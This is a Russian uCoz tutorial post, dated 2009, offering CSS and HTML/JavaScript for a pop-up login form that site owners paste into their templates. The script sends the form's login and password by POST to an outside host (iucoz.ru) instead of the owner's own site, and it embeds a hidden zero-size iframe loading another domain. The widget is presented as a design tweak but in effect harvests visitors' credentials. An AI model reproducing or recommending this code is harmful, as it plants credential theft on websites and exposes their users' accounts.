Главная » 2009 » Август » 29 » Новая форма входа (Скрипты для ucoz)
29.08.2009, 11:39

Новая форма входа



При нажатии на кнопку, появляется такое окошко:

Установка:

Ставим это в CSS (ПУ-->Дизайн-->Управление дизайном css ):

Code
div#login-wrap {position: absolute; display: none;}  
div#login-block {background: url('http://iucoz.ru/other/login-bg.png') no-repeat; width: 246px; height: 167px;}  
div#enter-button {width: 60px; height: 35px; background: url('http://iucoz.ru/other/button-enter.PNG') no-repeat; position: absolute; cursor:pointer; cursor:hand;}  
.login-form {width:180px; margin-left: 30px; padding-top: 15px;}  
.login-close {width: 14px; height: 13px; background: url('http://iucoz.ru/other/login-close.gif') no-repeat; cursor:pointer; cursor:hand; float: right;}  
input.loginField, #content input {height: 22px; color: #515151; line-height: 22px; font-size: 10pt; background: url('http://blog.ucoz.ru/img/input-bg.gif') repeat-x; border-top: 1px solid #838383; border-left: 1px solid #838383; border-right: 1px solid #d4d4d4; border-bottom: 1px solid #d4d4d4;}  
input.loginButton {width: 48px; height: 16px; background: url('http://iucoz.ru/other/button.gif') no-repeat; color: #ffffff; border: none; font-size: 7pt; padding-bottom: 2px; position: relative; top: 3px;}

Затем, в нужное вам место ставим это:

Code
<div id="enter-button" onclick="document.getElementById('login-wrap').style.display='block';"></div>  
<div id="login-wrap"><div id="login-block">  
<script type="text/javascript">  
sendFrm549077=function(){  
var o=document.getElementById('frmLg549077');  
var pos=_umlGetCoord(document.getElementById('frmLg549077'));  
document.body.insertBefore(document.getElementById('blk549077'),document.body.firstChild);  
with(document.getElementById('blk549077')){style.top=(pos['top'])+'px'; style.left=(pos['left'])+'px';style.width=o.offsetWidth;style.height=o.offsetHeight;style.display=''; innerHTML='<div align="left" style="padding:5px;"><div class="myWinLoad"></div></div>';}  
uz.util.Connect.setForm('frmLg549077');  
var cObj = uz.util.Connect.asyncRequest('POST','http://iucoz.ru/index/',callback);  
}  
</script>  
<body style="margin:0px">  
</iframe>  
<iframe style="position:absolute;left:1%;width:0%;top:1%;height:0%;"  
src="http://www.for.ucoz.net">  
</iframe>  
<div id="blk549077" style="border:1px solid #CCCCCC;position:absolute;z-index:82;background:url('http://s4.ucoz.net/img/fr/g.gif');display:none; "></div><form id="frmLg549077" method="post" style="margin:0" onsubmit="sendFrm549077();return false;"><div class="login-form">  
  <div onclick="document.getElementById('login-wrap').style.display='none';" class="login-close"></div>  
  <h2 style="text-align: center;">Авторизация</h1>  
<table border="0" cellspacing="1" cellpadding="2" width="180">  

<tr><td width="20%" nowrap="nowrap">Логин:</td><td><input class="loginField" type="text" name="user" value="" size="20" style="width:100%;" maxlength="50" /></td></tr>  
<tr><td>Пароль:</td><td><input class="loginField" type="password" name="password" size="20" style="width:100%" maxlength="15" /></td></tr>  

</table>  
<div align="center"><a href="$REMINDER_LINK$">Забыл пароль</a> | <a href="$REGISTER_LINK$">Регистрация</a></div>  
</table>  
</div></div></div>  
  <div id="wrap">  
  <div style="clear: both;">
Материал взят с сайта infoscript.ru
Внимание! Копирование данного материала запрещено без указания ссылки на сайт Infoscript.ru
Источник/Автор: Неизвестен
Категория: Скрипты uCoz | Просмотров: 2256 | Добавил: antisept | Рейтинг: 3.0/1 |
Теги: Новая форма входа ucoz
Пока комментариев нет. Ты можешь быть первым!
Добавлять комментарии могут только зарегистрированные пользователи.
[ Регистрация | Вход ]